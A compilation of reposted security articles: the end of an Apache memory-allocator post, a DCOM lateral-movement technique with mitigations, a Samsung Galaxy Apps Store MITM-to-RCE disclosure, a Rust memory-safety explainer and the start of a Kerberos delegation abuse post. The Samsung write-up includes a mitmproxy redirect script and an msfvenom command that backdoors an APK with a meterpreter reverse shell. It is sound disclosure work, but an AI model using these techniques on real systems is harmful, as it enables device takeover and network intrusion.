But back to Apache. When we started reporting use after free bugs we saw with the debugging option for the pool allocator, we learned from the Apache developers that there are incompatibilities with the http2 module and the pool debugger. This has led to replies after our disclosure that these are non-issues, because nobody should run the pool debugger in production.
It should be noted that we were also able to reproduce some bugs without the pool debugger in the latest Apache version (we have shared this information with Apache and will share it publicly later), and that indeed it seems some people did run the pool debugger in production (OpenBSD). But I have another problem with this. If we consider that parts of the current Apache code are incompatible with the APR pool debugger then we end up with an unfortunate situation: If a tool like ASAN reports memory safety bugs with the pool debugger we don’t know if they are real issues or just incompatibilities. If we turn off the pool debugger we won’t see most of the memory safety bugs. That’s a situation where testing Apache for memory safety bugs becomes practically very difficult. In my opinion that by itself is a worrying and severe security issue. Image source: Dreamstime, CC0 Sursa: https://blog.fuzzing-project.org/65-When-your-Memory-Allocator-hides-Security-Bugs.html
-
Lateral Movement via DCOM: Round 2 January 23, 2017 by enigma0x3 Most of you are probably aware that there are only so many ways to pivot, or conduct lateral movement to a Windows system. Some of those techniques include psexec, WMI, at, Scheduled Tasks, and WinRM (if enabled). Since there are only a handful of techniques, more mature defenders are likely able to prepare for and detect attackers using them. Due to this, I set out to find an alternate way of pivoting to a remote system. This resulted in identifying the MMC20.Application COM object and its “ExecuteShellCommand” method, which you can read more about here. Thanks to the help of James Forshaw (@tiraniddo), we determined that the MMC20.Application object lacked explicit “LaunchPermissions”, resulting in the default permission set allowing Administrators access: You can read more on that thread here. This got me thinking about other objects that have no explicit LaunchPermission set. Viewing these permissions can be achieved using @tiraniddo’s OleView .NET, which has excellent Python filters (among other things). In this instance, we can filter down to all objects that have no explicit Launch Permission. When doing so, two objects stood out to me: “ShellBrowserWindow” and “ShellWindows”: Another way to identify potential target objects is to look for the value “LaunchPermission” missing from keys in HKCR:\AppID\{guid}. An object with Launch Permissions set will look like below, with data representing the ACL for the object in Binary format: Those with no explicit LaunchPermission set will be missing that specific registry entry. The first object I explored was the “ShellWindows” instance. Since there is no ProgID associated with this object, we can use the Type.GetTypeFromCLSID .NET method paired with the Activator.CreateInstance method to instantiate the object via its AppID on a remote host. 
In order to do this, we need to get the CLSID for the ShellWindows object, which can be accomplished using OleView .NET as well:

[Edit] Thanks to @tiraniddo for pointing it out, the instantiation portions should have read "CLSID" instead of "AppID". This has been corrected below.
[Edit] Replaced screenshot of AppID with CLSID

As you can see below, the "Launch Permission" field is blank, meaning no explicit permissions are set. Now that we have the CLSID, we can instantiate the object on a remote target: With the object instantiated on the remote host, we can interface with it and invoke any methods we want. The returned handle to the object reveals several methods and properties, none of which we can interact with. In order to achieve actual interaction with the remote host, we need to access the ShellWindows.Item method, which will give us back an object that represents the Windows shell window: With a full handle on the Shell Window, we can now access all of the expected methods/properties that are exposed. After going through these methods, "Document.Application.ShellExecute" stood out. Be sure to follow the parameter requirements for the method, which are documented here. As you can see above, our command was executed on a remote host successfully.

Now that the "ShellWindows" object was tested and validated, I moved on to the "ShellBrowserWindow" object. One of the first things I noticed was that this particular object does not exist on Windows 7, making its use for lateral movement a bit more limited than the "ShellWindows" object, which I tested on Win7-Win10 successfully. Since the "ShellBrowserWindow" object was tested successfully on Windows 10-Server 2012R2, it should be noted as well. I took the same enumeration steps on the "ShellBrowserWindow" object as I did with the "ShellWindows" object. Based on my enumeration of this object, it appears to effectively provide an interface into the Explorer window just as the previous object does.
To instantiate this object, we need to get its CLSID. Similar to above, we can use OleView .NET:

[Edit] Replaced screenshot of AppID with CLSID

Again, take note of the blank Launch Permission field. With the CLSID, we can repeat the steps taken on the previous object to instantiate the object and call the same method: As you can see, the command successfully executed on the remote target. Since this object interfaces directly with the Windows shell, we don't need to invoke the "ShellWindows.Item" method, as on the previous object.

While these two DCOM objects can be used to run shell commands on a remote host, there are plenty of other interesting methods that can be used to enumerate or tamper with a remote target. A few of these methods include:

Document.Application.ServiceStart()
Document.Application.ServiceStop()
Document.Application.IsServiceRunning()
Document.Application.ShutDownWindows()
Document.Application.GetSystemInformation()

Defenses

You may ask, what can I do to mitigate or detect these techniques? One option is to enable the Domain Firewall, as this prevents DCOM instantiation by default. While this mitigation works, there are methods for an attacker to tamper with the Windows firewall remotely (one being remotely stopping the service). There is also the option of changing the default "LaunchPermissions" for all DCOM objects via dcomcnfg.exe by right clicking on "My Computer", selecting "Properties" and selecting "Edit Default" under "Launch and Activation Permissions". You can then select the Administrators group and uncheck "Remote Launch" and "Remote Activation":

Attempted instantiation of an object now results in "Access Denied": You can also explicitly set the permissions on the suspect DCOM objects to remove RemoteActivate and RemoteLaunch permissions from the Local Administrators group.
To do so, you will need to take ownership of the DCOM object’s HKCR AppID key, change the permissions via the Component Services MMC snap-in, and then change the ownership of the key back to TrustedInstaller. For example, this is the process of locking down the “ShellWindows” object.

First, take ownership of HKCR:\AppID\{9BA05972-F6A8-11CF-A442-00A0C90A8F39}. The GUID will be the AppID of the DCOM object; finding this was discussed above. You can achieve this by going into regedit, right clicking on the key and selecting “Permissions”. From there, you will find the “Ownership” tab under “Advanced”.

As you can see above, the current owner is “TrustedInstaller”, meaning you can’t currently modify the contents of the key. To take ownership, click “Other Users or Groups”, add “Administrators” if it isn’t already there, and click “Apply”:

Now that you have ownership of the “ShellWindows” AppID key, you will need to make sure the Administrators group has “FullControl” over the AppID key of the DCOM object. Once done, open the “Component Services” MMC snap-in, browse to “ShellWindows”, right click on it and select “Properties”. To modify the Remote Activation and Launch permissions, you will need to go over to the “Security” tab. If you successfully took ownership of the AppID key belonging to the DCOM object, the radio buttons for the security options should *not* be grayed out.

To modify the Launch and Activation permissions, click the “Edit” button under the “Launch and Activation Permissions” section. Once done, select the Administrators group and uncheck “Remote Activation” and “Remote Launch”. Click “OK” and then “Apply” to apply the changes.

Now that the Remote Activation and Launch permissions have been removed from the Administrators group, you will need to give ownership of the AppID key belonging to the DCOM object back to the TrustedInstaller account.
To do so, go back to the HKCR:\AppID\{9BA05972-F6A8-11CF-A442-00A0C90A8F39} registry key and navigate back to the “Other Users and Groups” section under the owner tab. To add the TrustedInstaller account back, you will need to change the “Location” to the local host and enter “NT SERVICE\TrustedInstaller” as the object name:

Click “OK” and then “Apply” to change the owner back. One important note: since we gave the Administrators group the “FullControl” permission on the AppID key belonging to the DCOM object, it is critical to remove that permission by unchecking the “FullControl” box for the Administrators group. Since the updated DCOM permissions are stored as “LaunchPermission” under that key, an attacker can simply delete that value remotely, opening the DCOM object back up if not properly secured.

After making these changes, you should see that instantiation of that specific DCOM object is no longer allowed remotely:

Keep in mind that while this mitigation does restrict the launch permissions of the given DCOM object, an attacker could theoretically remotely take ownership of the key and disable the mitigation, since it is stored in the registry. There is the option of disabling DCOM, which you can read about here. I have not tested to see if this breaks anything at scale, so proceed with caution.

As a reference, the three DCOM objects I have found that allow for remote code execution are as follows:

MMC20.Application (Tested Windows 7, Windows 10, Server 2012R2)
AppID: 7e0423cd-1119-0928-900c-e6d4a52a0715
ShellWindows (Tested Windows 7, Windows 10, Server 2012R2)
AppID: 9BA05972-F6A8-11CF-A442-00A0C90A8F39
ShellBrowserWindow (Tested Windows 10, Server 2012R2)
AppID: C08AFD90-F2A1-11D1-8455-00A0C91F3880

It should also be noted that there may be other DCOM objects allowing for similar actions performed remotely. These are simply the ones I have found so far.
Full Disclosure: I encourage anyone who implements these mitigations to test them extensively before integrating at scale. As with any system configuration change, it is highly encouraged to test it extensively to ensure nothing breaks. I have not tested these mitigations at scale.

As for detection, there are a few things you can look for from a network level. When running the execution of this technique through Wireshark, you will likely see an influx of DCERPC traffic, followed by some indicators. First, when the object is instantiated remotely, you may notice a “RemoteGetClassObject” request via ISystemActivator:

Following that, you will likely see “GetTypeInfo” requests from IDispatch along with “RemQueryInterface” requests via IRemUnknown2:

While this may, in most cases, look like normal DCOM/RPC traffic (to an extent), one large indicator of this technique being executed will be a request via IDispatch of GetIDsOfNames for “ShellExecute”:

Immediately following that request, you will see a treasure trove of useful information via an “Invoke Request”, including *exactly* what was executed via the ShellExecute method:

That will immediately be followed by the response code of the method execution (0 being success). This is what the actual execution of commands via this method looks like:

Cheers!
Matt N.

Source: https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/
-
Writeup – Samsung Galaxy Apps Store RCE via MITM
29 January, 2019
Portuguese version
Authors: André Baptista @0xacb, Luís Maia @0xfad0 and Rolando Martins @rolandomartins.

The update architecture of a mobile operating system is very important to make sure that the user can trust the software without the risk of being compromised during this process. A bug in the Samsung Galaxy Apps Store allowed an attacker to inject unauthorized and arbitrary code, through the interception of periodic update requests made by the Store.

Because the Samsung Galaxy Apps Store uses HTTP to initiate checks for updates, an attacker who can control network traffic (e.g. via MITM on the network) can change the URL used for load-balancing and redirect the requests for the mirrors to attacker-controlled domains. This could allow an attacker to trick Galaxy Apps into using an arbitrary hostname for which the attacker can provide a valid SSL certificate, and simulate the API of the app store to modify existing apps on a given device. An attacker could exploit this vulnerability to achieve Remote Code Execution on Samsung devices.

1. Methodology

1.1 Finding apps with interesting permissions

Analyzing Samsung’s entire mobile app ecosystem would be a huge task, and searching for apps that hold relevant permissions (for example, to install other apps) can reduce the vulnerability search space. Taking this approach, we developed a quick tool to dump and enumerate all the apps that use interesting permissions, so as to reduce the set our subsequent tools had to analyze. Using the Androguard tool, we analyzed all the APKs and generated a subset of candidate apps.

1.2 Finding relevant attack surface

Although being able to locally install apps without system permissions would be a good vulnerability in itself, we set as a goal to first check system applications that could install other apps, thereby providing an RCE if a vulnerability was found.
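Both filtering passes (by declared permission, and later by network- or signature-related code) boil down to intersecting app metadata with a small list of interesting items. The sketch below illustrates that idea only; the permission names and app entries are invented for the example, and in the real methodology the metadata would come from a tool such as Androguard parsing each APK's manifest:

```python
# Illustrative sketch of the attack-surface reduction described above.
# App metadata is hypothetical; Androguard would supply it in practice.
INTERESTING_PERMISSIONS = {
    "android.permission.INSTALL_PACKAGES",
    "android.permission.DELETE_PACKAGES",
}

apps = [
    {"name": "GalaxyAppsStore",
     "permissions": {"android.permission.INSTALL_PACKAGES",
                     "android.permission.INTERNET"}},
    {"name": "Calculator",
     "permissions": {"android.permission.INTERNET"}},
]

def interesting(app):
    """Keep only apps holding at least one high-value permission."""
    return bool(app["permissions"] & INTERESTING_PERMISSIONS)

subset = [app["name"] for app in apps if interesting(app)]
print(subset)  # ['GalaxyAppsStore']
```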
In order to reduce the attack surface even further, we assumed that Samsung would use SSL to prevent a MITM when downloading the APKs, so we wrote a few modules that would output the reduced set of APKs to analyze.

1.2.1 Transport Security

To create this subset, we compiled a list of classes and methods that would be used to make HTTP/HTTPS requests, and we checked all the apps against our list. This provided us with a smaller subset to look at. Although this method would dismiss applications that do not implement SSL and perform unsafe installs from untrusted sources, we like to assume that Samsung would at least try to use SSL when performing dangerous operations. We also intercepted network requests in a controlled environment to identify HTTP requests while playing with those apps.

1.2.2 Application Signature Validation

Many applications use SSL as part of their normal operations, and the previous subset was still quite large; in order to reduce it even further we filtered all the classes that contained the string “signature”.

1.3 Reverse Engineering

Looking at our reduced subset, we picked the most obvious application that could contain vulnerabilities related to package installation as the first application to look at: the Galaxy Apps Store. In order to facilitate the team work and use the amenities of an IDE, we used JADX to decompile the APK to a gradle project and imported it into Android Studio, which is useful to find class and variable usages and more.

2. Vulnerabilities

2.1 Lack of Transport Security (HTTP)

The Galaxy Apps Store retrieves a country-specific URL to be used by the Store. This request occurs periodically, when you start the app for the first time, or if your MCC (Mobile Country Code) changes. However, this request is made using HTTP and not HTTPS, which allows a MITM (man-in-the-middle) attack. In this POST request, the device sends information about the device status, such as: MCC, MNC, device model and language.
In the response, a country URL is returned to be used by the Store from then on. The country URL contains an HTTP URL, but the app will use HTTPS in the subsequent requests instead.

Figure 1: HTTP request
Figure 2: HTTP response

An attacker may intercept traffic on a given network, change the response of this request and provide an evil country URL to be used by the Galaxy Apps Store. The fake country URL controlled by the attacker can act as a proxy to the actual API and change multiple pieces of information on the fly, such as app names, images, permissions and more.

Figure 3: Country URL infection via MITM

2.2 Signature validation

At this point, our goal was to achieve RCE by installing arbitrary applications on the device. We analyzed requests for updating or installing applications, and we noticed that we could modify the URL of APK files. However, there was a signature parameter in the XML returned by the original server, but we were able to bypass this validation.

When a user wants to install or update an app, the Store requests information about the app. An XML document is returned, which contains information about permissions, the APK size, the URL to download the APK and a signature:

<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
<SamsungProtocol version="5.5">
...
<value name="contentsSize">72351744</value>
<value name="installSize">94371840</value>
<value name="signature">a0ce9d124dbc9a39f978f455255355684cc78881</value>
<value name="downloadUri">https://samsappsbn.vo.llnwd.net/astore_bin/fapbeixk0j/2018/1220/7d1791d56d.apk</value>
...
</SamsungProtocol>

First, we tried to change the downloadUri to a different APK we controlled with a reverse shell, but the Store client didn’t accept it because of the signature value. So, we tried to remove the signature tag from the XML, and an error was shown as well.
However, if the signature tag was present but with an empty value, i.e., <value name="signature"></value>, the signature would be accepted and a modified APK would be successfully installed.

3. PoC

In order to simplify our PoC, we used mitmproxy to intercept and modify requests. We created a script to automatically change the vulnerable HTTP response and infect the client with our fake service:

import re

SERVER = b"fakegalaxystore.com"

def response(flow):
    s = flow.response.content
    m = re.match(b"http:\/\/[a-z]+-odc\.samsungapps\.com", s)
    if m:
        s = s.replace(m.group(0), SERVER)
        flow.response.content = s
        print("#### %s" % s)
...

Once the client gets infected and starts using the fake store URL, applications may try to update, and the fake store service can also tell the client that there is a new update for a given app. When a client wants to install or update a given app, the attacker’s server may replace the download URI with a link to a backdoored APK file, which would be installed on the device with extra permissions. Because of the lack of validation on the signature field (if the XML tag is empty, but not missing, the device blindly accepts the APK from the store), it is possible to modify and infect the requested APKs on the fly, for any app being downloaded from the store, without computing signatures.

In our PoC we download, store and backdoor the original APK files using msfvenom as they are requested by clients:

msfvenom -x original.apk -p android/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=4444 -o backdoor.apk

The service that exploits this vulnerability looks like this:

Figure 4: Exploitation diagram

4. Conclusion

The Store is a privileged app with INSTALL permissions, allowing the attacker to modify the manifest to add more permissions than those shown to the user in the app.
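The signature handling described in section 2.2 (a missing tag is rejected, but a present-and-empty tag is accepted) can be modelled with a short sketch. This is a reconstruction of the client's apparent decision logic for illustration, not Samsung's actual code:

```python
import xml.etree.ElementTree as ET

def signature_accepted(xml_text: str) -> bool:
    """Reconstruction of the flawed client-side check: reject a missing
    signature tag, but accept a tag that is present yet empty."""
    root = ET.fromstring(xml_text)
    sig = root.find(".//value[@name='signature']")
    if sig is None:
        return False               # missing tag -> error, as observed
    if not (sig.text or "").strip():
        return True                # empty tag -> accepted: the bypass
    return real_signature_check(sig.text)

def real_signature_check(signature: str) -> bool:
    # Stand-in for the genuine verification; a tampered APK fails here.
    return False

tampered = "<SamsungProtocol><value name='signature'></value></SamsungProtocol>"
print(signature_accepted(tampered))  # True: the modified APK is installed
```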
The user would be unaware that the installed application has more permissions than those presented in the install menu of the store, since the permission list can be modified in the server response. Infecting a device with a fake store API URL via MITM, backdooring applications on the fly and bypassing the signature mechanism allowed us to install modified apps and then execute arbitrary code (RCE) on devices that use the Galaxy Apps Store.

Affected versions: Samsung Apps Store < 4.3.01.7

Tested on Samsung devices: A5 2017 (A520), Note 8 (N950F), A8 2018 (A530F), S7 (G930F), XCover 4 (G390F), S8 (G950F), S8 Plus (G955F), J7 2017 (J730F)

Timeline:
30/05/2018 – Reported to Samsung Bug Bounty program
30/05/2018 – Triaged (Severity: High)
27/09/2018 – Fixed (Galaxy Apps Store 4.3.01.7 released)
16/10/2018 – Bounty awarded
13/12/2018 – CVE entry created https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20135

Source: https://www.adyta.pt/en/2019/01/29/writeup-samsung-app-store-rce-via-mitm-2/
-
Fearless Security: Memory Safety
By Diane Hosfelt
Posted on January 23, 2019 in Featured Article, Rust, and Security

Fearless Security

Last year, Mozilla shipped Quantum CSS in Firefox, which was the culmination of 8 years of investment in Rust, a memory-safe systems programming language, and over a year of rewriting a major browser component in Rust. Until now, all major browser engines have been written in C++, mostly for performance reasons. However, with great performance comes great (memory) responsibility: C++ programmers have to manually manage memory, which opens a Pandora’s box of vulnerabilities. Rust not only prevents these kinds of errors, but the techniques it uses to do so also prevent data races, allowing programmers to reason more effectively about parallel code.

In the coming weeks, this three-part series will examine memory safety and thread safety, and close with a case study of the potential security benefits gained from rewriting Firefox’s CSS engine in Rust.

What Is Memory Safety

When we talk about building secure applications, we often focus on memory safety. Informally, this means that in all possible executions of a program, there is no access to invalid memory. Violations include:

use after free
null pointer dereference
using uninitialized memory
double free
buffer overflow

For a more formal definition, see Michael Hicks’ What is memory safety post and The Meaning of Memory Safety, a paper that formalizes memory safety.

Memory violations like these can cause programs to crash unexpectedly and can be exploited to alter intended behavior. Potential consequences of a memory-related bug include information leakage, arbitrary code execution, and remote code execution.

Managing Memory

Memory management is crucial to both the performance and the security of applications. This section will discuss the basic memory model. One key concept is pointers. A pointer is a variable that stores a memory address.
If we visit that memory address, there will be some data there, so we say that the pointer is a reference to (or points to) that data. Just like a home address shows people where to find you, a memory address shows a program where to find data. Everything in a program is located at a particular memory address, including code instructions. Pointer misuse can cause serious security vulnerabilities, including information leakage and arbitrary code execution.

Allocation/free

When we create a variable, the program needs to allocate enough space in memory to store the data for that variable. Since the memory owned by each process is finite, we also need some way of reclaiming resources (or freeing them). When memory is freed, it becomes available to store new data, but the old data can still exist until it is overwritten.

Buffers

A buffer is a contiguous area of memory that stores multiple instances of the same data type. For example, the phrase “My cat is Batman” would be stored in a 16-byte buffer. Buffers are defined by a starting memory address and a length; because the data stored in memory next to a buffer could be unrelated, it’s important to ensure we don’t read or write past the buffer boundaries.

Control Flow

Programs are composed of subroutines, which are executed in a particular order. At the end of a subroutine, the computer jumps to a stored pointer (called the return address) to the next part of code that should be executed. When we jump to the return address, one of three things happens:

The process continues as expected (the return address was not corrupted).
The process crashes (the return address was altered to point at non-executable memory).
The process continues, but not as expected (the return address was altered and control flow changed).

How languages achieve memory safety

We often think of programming languages on a spectrum.
On one end, languages like C/C++ are efficient, but require manual memory management; on the other, interpreted languages use automatic memory management (like reference counting or garbage collection [GC]), but pay the price in performance. Even languages with highly optimized garbage collectors can’t match the performance of non-GC’d languages.

Manually

Some languages (like C) require programmers to manually manage memory by specifying when to allocate resources, how much to allocate, and when to free the resources. This gives the programmer very fine-grained control over how their implementation uses resources, enabling fast and efficient code. However, this approach is prone to mistakes, particularly in complex codebases. Mistakes that are easy to make include:

forgetting that resources have been freed and trying to use them
not allocating enough space to store data
reading past the boundary of a buffer

A safety video candidate for manual memory management

Smart pointers

A smart pointer is a pointer with additional information to help prevent memory mismanagement. These can be used for automated memory management and bounds checking. Unlike raw pointers, a smart pointer is able to self-destruct, instead of waiting for the programmer to manually destroy it. There’s no single smart pointer type—a smart pointer is any type that wraps a raw pointer in some practical abstraction. Some smart pointers use reference counting to count how many variables are using the data owned by a variable, while others implement a scoping policy to constrain a pointer lifetime to a particular scope.

In reference counting, the object’s resources are reclaimed when the last reference to the object is destroyed. Basic reference counting implementations can suffer from performance and space overhead, and can be difficult to use in multi-threaded environments.
Situations where objects refer to each other (cyclical references) can prohibit either object’s reference count from ever reaching zero, which requires more sophisticated methods.

Garbage Collection

Some languages (like Java, Go, Python) are garbage collected. A part of the runtime environment, named the garbage collector (GC), traces variables to determine what resources are reachable in a graph that represents references between objects. Once an object is no longer reachable, its resources are not needed and the GC reclaims the underlying memory to reuse in the future. All allocations and deallocations occur without explicit programmer instruction. While a GC ensures that memory is always used validly, it doesn’t reclaim memory in the most efficient way. The last time an object is used could occur much earlier than when it is freed by the GC. Garbage collection has a performance overhead that can be prohibitive for performance critical applications; it requires up to 5x as much memory to avoid a runtime performance penalty.

Ownership

To achieve both performance and memory safety, Rust uses a concept called ownership. More formally, the ownership model is an example of an affine type system. All Rust code follows certain ownership rules that allow the compiler to manage memory without incurring runtime costs:

Each value has a variable, called the owner.
There can only be one owner at a time.
When the owner goes out of scope, the value will be dropped.

Values can be moved or borrowed between variables. These rules are enforced by a part of the compiler called the borrow checker. When a variable goes out of scope, Rust frees that memory. In the following example, when s1 and s2 go out of scope, they would both try to free the same memory, resulting in a double free error. To prevent this, when a value is moved out of a variable, the previous owner becomes invalid. If the programmer then attempts to use the invalid variable, the compiler will reject the code.
This can be avoided by creating a deep copy of the data or by using references.

Example 1: Moving ownership

let s1 = String::from("hello");
let s2 = s1;

//won't compile because s1 is now invalid
println!("{}, world!", s1);

Another set of rules verified by the borrow checker pertains to variable lifetimes. Rust prohibits the use of uninitialized variables and dangling pointers, which can cause a program to reference unintended data. If the code in the example below compiled, r would reference memory that is deallocated when x goes out of scope—a dangling pointer. The compiler tracks scopes to ensure that all borrows are valid, occasionally requiring the programmer to explicitly annotate variable lifetimes.

Example 2: A dangling pointer

let r;
{
    let x = 5;
    r = &x;
}
println!("r: {}", r);

The ownership model provides a strong foundation for ensuring that memory is accessed appropriately, preventing undefined behavior.

Memory Vulnerabilities

The main consequences of memory vulnerabilities include:

Crash: accessing invalid memory can make applications terminate unexpectedly
Information leakage: inadvertently exposing non-public data, including sensitive information like passwords
Arbitrary code execution (ACE): allows an attacker to execute arbitrary commands on a target machine; when this is possible over a network, we call it a remote code execution (RCE)

Another type of problem that can appear is memory leakage, which occurs when memory is allocated, but not released after the program is finished using it. It’s possible to use up all available memory this way. Without any remaining memory, legitimate resource requests will be blocked, causing a denial of service. This is a memory-related problem, but one that can’t be addressed by programming languages. The best case scenario with most memory errors is that an application will crash harmlessly—this isn’t a good best case.
However, the worst case scenario is that an attacker can gain control of the program through the vulnerability (which could lead to further attacks).

Misusing Free (use-after-free, double free)

This subclass of vulnerabilities occurs when some resource has been freed, but its memory position is still referenced. It’s a powerful exploitation method that can lead to out of bounds access, information leakage, code execution and more. Garbage-collected and reference-counted languages prevent the use of invalid pointers by only destroying unreachable objects (which can have a performance penalty), while manually managed languages are particularly susceptible to invalid pointer use (particularly in complex codebases). Rust’s borrow checker doesn’t allow object destruction as long as references to the object exist, which means bugs like these are prevented at compile time.

Uninitialized variables

If a variable is used prior to initialization, the data it contains could be anything—including random garbage or previously discarded data, resulting in information leakage (these are sometimes called wild pointers). Often, memory managed languages use a default initialization routine that is run after allocation to prevent these problems. Like C, most variables in Rust are uninitialized until assignment—unlike C, you can’t read them prior to initialization. The following code will fail to compile:

Example 3: Using an uninitialized variable

fn main() {
    let x: i32;
    println!("{}", x);
}

Null pointers

When an application dereferences a pointer that turns out to be null, usually this means that it simply accesses garbage that will cause a crash. In some cases, these vulnerabilities can lead to arbitrary code execution 1 2 3. Rust has two types of pointers, references and raw pointers. References are safe to access, while raw pointers could be problematic.
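As a rough illustration of the Option pattern discussed in the article (and only an illustration, since Python cannot enforce this at compile time the way Rust does), a function can make the "might be absent" case explicit in its signature and push callers to handle None before using the value:

```python
from typing import Optional

def find_role(users: dict, name: str) -> Optional[str]:
    """Returns the user's role, or None; the 'null' case is explicit
    in the signature, loosely mirroring Rust's Option<T>."""
    return users.get(name)

role = find_role({"alice": "admin"}, "bob")
# The caller must handle the None arm before using the value;
# Rust would refuse to compile code that ignores the Option.
print(role.upper() if role is not None else "no such user")  # no such user
```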
Rust prevents null pointer dereferencing two ways:

Avoiding nullable pointers
Avoiding raw pointer dereferencing

Rust avoids nullable pointers by replacing them with a special Option type. In order to manipulate the possibly-null value inside of an Option, the language requires the programmer to explicitly handle the null case or the program will not compile.

When we can’t avoid nullable pointers (for example, when interacting with non-Rust code), what can we do? Try to isolate the damage. Any dereferencing of raw pointers must occur in an unsafe block. This keyword relaxes Rust’s guarantees to allow some operations that could cause undefined behavior (like dereferencing a raw pointer).

Buffer overflow

While the other vulnerabilities discussed here are prevented by methods that restrict access to undefined memory, a buffer overflow may access legally allocated memory. The problem is that a buffer overflow inappropriately accesses legally allocated memory. Like a use-after-free bug, out-of-bounds access can also be problematic because it accesses freed memory that hasn’t been reallocated yet, and hence still contains sensitive information that’s supposed to not exist anymore.

A buffer overflow simply means an out-of-bounds access. Due to how buffers are stored in memory, they often lead to information leakage, which could include sensitive data such as passwords. More severe instances can allow ACE/RCE vulnerabilities by overwriting the instruction pointer.

Example 4: Buffer overflow (C code)

int main() {
    int buf[] = {0, 1, 2, 3, 4};

    // print out of bounds
    printf("Out of bounds: %d\n", buf[10]);

    // write out of bounds
    buf[10] = 10;
    printf("Out of bounds: %d\n", buf[10]);

    return 0;
}

The simplest defense against a buffer overflow is to always require a bounds check when accessing elements, but this adds a runtime performance penalty. How does Rust handle this?
The built-in buffer types in Rust’s standard library require a bounds check for any random access, but also provide iterator APIs that can reduce the impact of these bounds checks over multiple sequential accesses. These choices ensure that out-of-bounds reads and writes are impossible for these types. Rust promotes patterns that lead to bounds checks only occurring in those places where a programmer would almost certainly have to manually place them in C/C++.

Memory safety is only half the battle

Memory safety violations open programs to security vulnerabilities like unintentional data leakage and remote code execution. There are various ways to ensure memory safety, including smart pointers and garbage collection. You can even formally prove memory safety. While some languages have accepted slower performance as a tradeoff for memory safety, Rust’s ownership system achieves both memory safety and minimizes the performance costs.

Unfortunately, memory errors are only part of the story when we talk about writing secure code. The next post in this series will discuss concurrency attacks and thread safety.

Exploiting Memory: In-depth resources

Heap memory and exploitation
Smashing the stack for fun and profit
Analogies of Information Security
Intro to use after free vulnerabilities

About Diane Hosfelt @avadacatavra

Source: https://hacks.mozilla.org/2019/01/fearless-security-memory-safety/
-
Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory
28 January 2019 • Elad Shamir • 41 min read

Back in March 2018, I embarked on an arguably pointless crusade to prove that the TrustedToAuthForDelegation attribute was meaningless, and that “protocol transition” can be achieved without it. I believed that security wise, once constrained delegation was enabled (msDS-AllowedToDelegateTo was not null), it did not matter whether it was configured to use “Kerberos only” or “any authentication protocol”.

I started the journey with Benjamin Delpy’s (@gentilkiwi) help modifying Kekeo to support a certain attack that involved invoking S4U2Proxy with a silver ticket without a PAC, and we had partial success, but the final TGS turned out to be unusable. Ever since then, I kept coming back to it, trying to solve the problem with different approaches but did not have much success. Until I finally accepted defeat, and ironically then the solution came up, along with several other interesting abuse cases and new attack techniques.

TL;DR

This post is lengthy, and I am conscious that many of you do not have the time or attention span to read it, so I will try to convey the important points first:

Resource-based constrained delegation does not require a forwardable TGS when invoking S4U2Proxy.
S4U2Self works on any account that has an SPN, regardless of the state of the TrustedToAuthForDelegation attribute. If TrustedToAuthForDelegation is set, then the TGS that S4U2Self produces is forwardable, unless the principal is sensitive for delegation or a member of the Protected Users group.
The above points mean that if an attacker can control a computer object in Active Directory, then it may be possible to abuse it to compromise the host.
S4U2Proxy always produces a forwardable TGS, even if the provided additional TGS in the request was not forwardable.
The above point means that if an attacker compromises any account with an SPN as well as an account with classic constrained delegation, then it does not matter whether the TrustedToAuthForDelegation attribute is set.
By default, any domain user can abuse the MachineAccountQuota to create a computer account and set an SPN for it, which makes it even more trivial to abuse resource-based constrained delegation to mimic protocol transition (obtain a forwardable TGS for arbitrary users to a compromised service).
S4U2Self allows generating a valid TGS for arbitrary users, including those marked as sensitive for delegation or members of the Protected Users group. The resulting TGS has a PAC with a valid KDC signature. All that’s required is the computer account credentials or a TGT.
The above point in conjunction with unconstrained delegation and “the printer bug” can lead to remote code execution (RCE).
Resource-based constrained delegation on the krbtgt account allows producing TGTs for arbitrary users, and can be abused as a persistence technique.
Configuring resource-based constrained delegation through NTLM relay from HTTP to LDAP may facilitate remote code execution (RCE) or local privilege escalation (LPE) on MSSQL servers, and local privilege escalation (LPE) on Windows 10/2016/2019.
Computer accounts just got a lot more interesting. Start hunting for more primitives to trigger attack chains!

Kerberos Delegation 101

If you are not up to speed with abusing Kerberos delegation, you should first read the post S4U2Pwnage by Will Schroeder (@harmj0y) and Lee Christensen (@tifkin_). In that post, they explained it better than I ever could, but I will try to capture it very concisely as well.

First, a simplified overview of Kerberos:

When users log in, they encrypt a piece of information (a timestamp) with an encryption key derived from their password, to prove to the authentication server that they know the password. This step is called “preauthentication”.
In Active Directory environments, the authentication server is a domain controller. Upon successful preauthentication, the authentication server provides the user with a ticket-granting-ticket (TGT), which is valid for a limited time. When a user wishes to authenticate to a certain service, the user presents the TGT to the authentication server. If the TGT is valid, the user receives a ticket-granting service (TGS), also known as a “service ticket”, from the authentication server. The user can then present the TGS to the service they want to access, and the service can authenticate the user and make authorisation decisions based on the data contained in the TGS. A few important notes about Kerberos tickets: Every ticket has a clear-text part and an encrypted part. The clear-text part of the ticket contains the Service Principal Name (SPN) of the service for which the ticket is intended. The encryption key used for the encrypted part of the ticket is derived from the password of the account of the target service. TGTs are encrypted for the built-in account “krbtgt”. The SPN on TGTs is krbtgt/domain name. Often, there is a requirement for a service to impersonate the user to access another service. To facilitate that, the following delegation features were introduced to the Kerberos protocol: Unconstrained Delegation (TrustedForDelegation): The user sends a TGS to access the service, along with their TGT, and then the service can use the user’s TGT to request a TGS for the user to any other service and impersonate the user. Constrained Delegation (S4U2Proxy): The user sends a TGS to access the service (“Service A”), and if the service is allowed to delegate to another pre-defined service (“Service B”), then Service A can present to the authentication service the TGS that the user provided and obtain a TGS for the user to Service B. Note that the TGS provided in the S4U2Proxy request must have the FORWARDABLE flag set. 
